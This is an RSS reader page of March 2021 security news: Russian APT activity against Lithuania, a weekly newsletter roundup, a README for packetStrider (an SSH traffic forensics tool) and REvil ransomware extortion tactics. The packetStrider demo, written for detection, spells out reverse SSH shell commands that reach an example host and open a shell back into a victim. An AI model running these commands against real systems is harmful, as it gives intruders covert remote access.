RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Today — 7 March 2021Main stream

Russia-linked APT groups exploited Lithuanian infrastructure to launch attacks

7 March 2021 at 14:54

Russia-linked APT groups leveraged the Lithuanian nation’s technology infrastructure to launch cyber-attacks against targets worldwide.

The annual national security threat assessment report released by Lithuania’s State Security Department states that Russia-linked APT groups conducted cyber-attacks against top Lithuanian officials and decision-makers last in 2020.

APT29 state-sponsored hackers also exploited Lithuania’s information technology infrastructure to carry out attacks against “foreign entities developing a COVID-19 vaccine.”

In 2020, Russian intelligence operations against Lithuania decreased due to the COVID-19 pandemic, but Russia-linked APT groups increased cyber espionage campaigns against targets worldwide.

“Nevertheless, Russian intelligence operations pose a major threat to Lithuania’s national security,” State Security Department head Darius Jauniskis told Lithuanian lawmakers during the presentation of the report at the Parliament.

Jauniskis explained that the Russian government is using military and economic means to carry out its operation, including disinformation campaigns.

The report states that both cyber attacks and disinformation campaigns have increased in Lithuania in the last 12 months.

Jauniskis added that Russia-linked APT groups attempted to destabilize the political context in Lithuania by exploiting the pandemic in misinformation campaigns. Lithuanian authorities observed “dozens” of “failed attempts” to conduct disinformation campaigns.

“Those activities were well-coordinated and fueled by anti-Western propaganda coming out from the Kremlin,” Jauniskis added.

In the last years, security experts documented multiple hacking and disinformation campaigns, attributed to Russia-linked APT groups, that targeted Lithuania, Estonia, and Latvia.

Estonia’s foreign intelligence agency also blamed Russia for cyber attacks exploiting COVID-19 pandemic to create havoc in the national contest.

In April 2019, a major and orchestrated misinformation cyber attack hit the Lithuanian Defense Minister Raimundas Karoblis with the intent of discrediting him and the Lithuanian national defense system.

In December 2016, Lithuania blamed Russia for cyber attacks that hit government networks over the previous two years. The head of cyber security Rimtautas Cerniauskas confirmed the discovery of at least three Russian spyware on government computers since 2015.

Lithuanian officials targeted by the alleged Russian spyware held mid-to-low ranking positions at the government, anyway Cerniauskas confirmed their PCs contained government sensitive documents.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Lithuania)

The post Russia-linked APT groups exploited Lithuanian infrastructure to launch attacks appeared first on Security Affairs.

Security Affairs newsletter Round 304

7 March 2021 at 12:33

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the international press subscribe here.

EU leaders aim at boosting defense and security, including cybersecurity
New Zealand-based cryptocurrency exchange Cryptopia hacked again
ByteDance agreed to pay $92M in US privacy Settlement for TikTok data collection
Gootkit delivery platform Gootloader used to deliver additional payloads
Intern caused ‘solarwinds123 password leak, former SolarWinds CEO says
NSA embraces the Zero Trust Security Model
Alleged China-linked APT41 group targets Indian critical infrastructures
Distributor of Asian food JFC International hit by Ransomware
French multinational dairy Lactalis hit by a cyber attack
Pwn20wnd released the unc0ver v 6.0 jailbreaking tool
Attackers took over the Perl.com domain in September 2020
Bug bounty hunter awarded $50,000 for a Microsoft account hijack flaw
Clop ransomware gang leaks data allegedly stolen from cybersecurity firm Qualys
Cyber Defense Magazine – March 2021 has arrived. Enjoy it!
Data Breach: Millions of Phone Numbers, Recordings, and Call Logs Compromised in Ringostat Data Leak
Four zero-days in Microsoft Exchange actively exploited in the wild
Google fixes Critical Remote Code Execution issue in Android System component
The Ursnif Trojan has hit over 100 Italian banks
CISA emergency directive urges to fix Microsoft Exchange zero-days
Group-IB: ransomware empire prospers in pandemic-hit world. Attacks grow by 150%
GRUB2 boot loader maintainers fixed hundreds of flaws
Sunshuttle, the fourth malware allegedly linked to SolarWinds hack
VMware addresses Remote Code Execution issue in View Planner
Five privilege escalation flaws fixed in Linux Kernel
GoldMax, GoldFinder, and Sibot, 3 new malware used by SolarWinds attackers
Managed Services provider CompuCom by Darkside ransomware
Millions of travelers of several airlines impacted by SITA data breach
Microsoft releases IOC Detection Tool for Microsoft Exchange Server flaws

If you want to receive the weekly Security Affairs Newsletter for free subscribe here. Subscribing to the newsletter you will also receive the best of the international press on cybersecurity, intelligence, and cybercrime.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 304 appeared first on Security Affairs.

packetStrider - A Network Packet Forensics Tool For SSH

7 March 2021 at 11:30
By: Zion3R


packetStrider for SSH is a packet forensics tool that aims to provide valuable insight into the nature of SSH traffic, shining a light into the corners of SSH network traffic where golden nuggets of information previously lay in the dark.


The problem that packet strider aims to help with (AKA Why?)

SSH is obviously encrypted, yet valuable contextual information still exists within the network traffic that can go towards TTP's, intent, success and magnitude of actions on objectives. There may even exist situations where valuable context is not available or deleted from hosts, and so having an immutable and un-alterable passive network capture gives additional forensic context. "Packets don't lie".

Separately to the forensic context, packet strider predictions could also be used in an active fashion, for example to shun/RST forward connections if a tunneled reverse SSH session initiation feature is predicted within, even before reverse authentication is offered.


The broad techniques of packet strider (AKA How?)
  • Builds a rich feature set in the form of pandas dataframes. Over 40 features are engineered from packet metadata such as SSH Protocol message content, normalized statistics, direction, size, latency and sliding window features.
  • Strides through this feature set numerous times using sliding windows (Inspired by Convolutional Neural networks) to predict:
    • The use -R option in the forward session - this is what enables a Reverse connection to be made later in the session. This artefact is discovered very early in the session, directly after the forward session is authenticated. This is the first available warning sign that Reverse sessions are possible.
    • Initiation of the Reverse SSH session, this can occur at any point (early, or late) in the forward session. This is discovered prior to the Reverse session being authenticated successfully. This is the second warning sign, in that a reverse session has just been requested and setup for authentication.
    • Success and/or Failure of the Reverse session authentication. This is the third and final warning sign, after this point you know someone is on your host, inside a reverse session.
    • The use of the -A option (SSH Agent Forwarding), which enables the client to share it's local SSH private keys with the server. This functionality is generally considered dangerous. References: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident https://skylightcyber.com/2019/09/26/all-your-cloud-are-belong-to-us-cve-2019-12491/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12491
    • All predictions and metadata reports on a stream by stream basis.
    • Human or scripted, based on timing deltas.
    • Is the server already known to the client? or was it the first time a connection between the two has been made. This is done through packet deltas associated with known_hosts.
    • Whether a client certificate or password auth was used, and if length of password is 8 chars or less.
    • keystrokes, delete key press, enter key presses (cut and paste and up/down is YMMV/experimental).
    • exfil/infil data movement predictions in both Forward and Reverse sessions.
    • Works on interactive sessions as well as file based ssh file transfer apps (eg scp, putty, cyberduck etc).

Getting started

Python3 has been used, and you will need the following modules (YMMV on python2)

pip3 install pandas matplotlib pyshark

Usage:

python3 packetStrider-ssh.py -h

Output:

usage: packetStrider-ssh.py [-h] [-f FILE] [-n NSTREAM] [-m] [-k] [-p]
[-z ZOOM] [-d DIRECTION] [-o OUTPUT_DIR]
[-w WINDOW] [-s STRIDE]

packetStrider-ssh is a packet forensics tool for SSH. It creates a rich
feature set from packet metadata such SSH Protocol message content, direction,
size, latency and sequencing. It performs pattern matching on these features,
using statistical analysis, and sliding windows to predict session initiation,
keystrokes, human/script behavior, password length, use of client
certificates, context into the historic nature of client/server contact and
exfil/infil data movement characteristics in both Forward and Reverse sessions

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE pcap file to analyze
-n NSTREAM, --nstream NSTREAM
Perform analysis only on stream n
-m, --metaonly Display stream metadata only
-k, --keystrokes Perform keystroke prediction
-p, --predict_plot Plot data movement and keystrokes
-z ZOOM, --zoom ZOOM Narrow down/zoom the analysis and plotting to only
packets "x-y"
-d DIRECTION, --direction DIRECTION
Perform analysis on SSH direction : "forward",
"reverse" OR "both"
-o OUTPUT_DIR, --output_dir OUTPUT_DIR
Directory to output plots
-w WINDOW, --window WINDOW
Sliding window size, # of packets to side of window
center packet, default is 2
-s STRIDE, --stride STRIDE
Stride between sliding windows, default is 1

Example

The pcap "forward_reverse.pcap" is from a common TTP of a Reverse SSH shell, a favorite of red teams everywhere. Specifically the following commands were used, to highlight the capabilities of packet strider in a simple way:

  • Forward connection from victim

    • The command for the forward session was ssh user@1.2.3.4 -R 31337:localhost:22 which binds local port 31337 ready for the reverse SSH connection back to the victim PC. This connection can be effected in many ways including manually, by an RCE, SSRF, or some form of persistence. For the purpose of this demo, it is a manual standard forward session.
    • This was NOT the first time the client has seen the server , we see this because the delta for related packets was very small , the server's key fingerprint was already in the client's known_hosts, so the user was not prompted to add it - which would increase the latency of packets.
    • Two consecutive failed password logins by a human, followed by a successful login with an 8+ character password.
    • ls is typed in forward session, in this sequence: 'l' 'w' 'w' 'back-space' 'back-space' 's' and then enter. The total size of data over the wire that is transmitted (as the output of ls) is classified as infiltration, given that is inbound.
  • Now on the attacker's machine (the server), a reverse shell is initiated back to the victim:

    • ssh victim@localhost -p 31337. At this point, which is even before authentication process begins, packet strider has identified the Reverse session SSH initiation, at packet 72
    • Now the attacker has a reverse shell on the victim host. From here they can turn off history settings, and run whatever lateral movement or ransacking highinks they desire. The simple examples in this demo are initial user recon.
    • last is run in the form of keystrokes 'l' 'a' 's' 'r' 'delete' 't' 'enter'
    • whois run in the form of 'w' 'h' 'o' 'enter'
    • exitis run in the form of 'e' 'x' 'i' 't'
  • Then finally with the Forward session the session is closed, just to demonstrate that the forward SSH feature detection still works.

    • exit

Network traffic from this activity is saved to tcpdump.pcap and now it's time to run Packet Strider.

python3 packetStrider-ssh.py -f tcpdump.pcap -k -p -o out



This plot shows a timeline of key predictions (image has been annotated here)



This plot shows some window statistics, useful for a deep dive and experimenting with features.



This plot shows a simple histogram



Inspiration

This project was done as a personal Proof of Concept, as a way for me to practice with some data science libraries in Python, it was heavily inspired by my Coursera studies in Machine Learning and Data Science, in particular the pandas library and the way in which Convolutional Neural Networks (CNN) "stride" through image pixel sets using sliding windows to detect certain features within.


Tips

Packet Strider does a vast amount of "striding" in full capacity mode. This can result in some substantial resource usage if the pcap is large, or more precisely if there are many packets in the pcap. Here are some speed up tips, these are particularly useful as an initial run for example just to see if there was reverse SSH activity predicted, and then adding functionality if you desire.

  • Ensure you are running with the latest patches of modules that do some heavy lifting, eg pyshark/tshark, pandas and matplotlib.
  • The -p --predict_plot option is the most intensive operation. Think about just running with the output to terminal, and then see if you'd like this plotted.
  • Use the -m --metaonly option. This only retrieves the high level metadata such as Protocol names and HASSH data. This can be useful to quickly determine if you are dealing with an interactive session using OpenSSH, or with a file transfer client like Cyberduck.
  • Pre filter the pcap to the ssh traffic.
  • Pre filter the pcap to the stream you want, which you may have learned by previously running with the speedy -m --metaonly option. You can examine only stream "NSTREAM" with the "-n NSTREAM" option, or you can pre filter with wireshark etc.
  • There may be times when you identify something interesting in a subset of a very large packet set. Here you can use the zoom feature to only examine and plot the packets in the region you are interested in. Use -z ZOOM, --zoom ZOOM for this. eg -z 100-500
  • Most times you will be interested in understanding keystroke activity, so while not using the -k option will save processing speed, it also means you won't get this valuable insight.

TODO
  • More protocols!
  • Look at Multi threading and see where this can help processing speed.
  • Improve efficiency of script, particularly plotting times.
  • Improve the Pasting indicator
  • Improve the 'up/down' key indicator
  • Annotate plots with imagemagick or similar
  • Improve the reporting function, write out to disk.
  • The Reverse key indicator is conservative because of packet encapsulation can potentially report two keystrokes. This issue does not exist for forward keystrokes, as the packet order has been treated in case they come in out of order. Examine options here.
  • Port to golang for speed
  • Real time mode
  • Examine the effect of additional tunneling local ports over the forward connection.

Disclaimer

Use at your own risk. See License terms.



REvil Ransomware gang uses DDoS attacks and voice calls to make pressure on the victims

7 March 2021 at 09:48

The REvil ransomware operators are using DDoS attacks and voice calls to journalists and victim’s business partners to force victims to pay the ransom.

The REvil/Sodinokibi ransomware operators announced that they are using DDoS attacks and voice calls to victim’s business partners and journalists to force the victims into pay the ransom.

The announcement shows an improvement in the double-extortion tactic, which doesn’t limit to threatening the victims to leak the stolen files in case they don’t pay the ransom.

According to Bleepingcomputer, in February, the REvil ransomware gang published a job notice where they searching for experts to perform DDoS attacks and use VOIP calls to contact victims and their business partners.

The malware researcher who goes online with the moniker 3xp0rt reported that REvil operators are offering to their network of affiliates new options to make pressure on victims, in particular calls to news media and business partners for free, and DDoS (Layer 3 and 7) attacks as a paid service.

#Malware #Ransomware #REvil

REvil Ransomware launched a service for contact to news media, companies for the best pressure at no cost, and DDoS (L3, L7) as a paid service.

Also, they reminded about developing support for VM ESXi and a polymorphic engine for windows. pic.twitter.com/MahKROK161

— 3xp0rt (@3xp0rtblog) March 6, 2021

Unfortunately, these extortion options are not a novelty in the threat landscape. Multiple ransomware gangs use VOIP calls and DDoS attacks to make pressure on the victims.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, REvil ransomware)

The post REvil Ransomware gang uses DDoS attacks and voice calls to make pressure on the victims appeared first on Security Affairs.

❌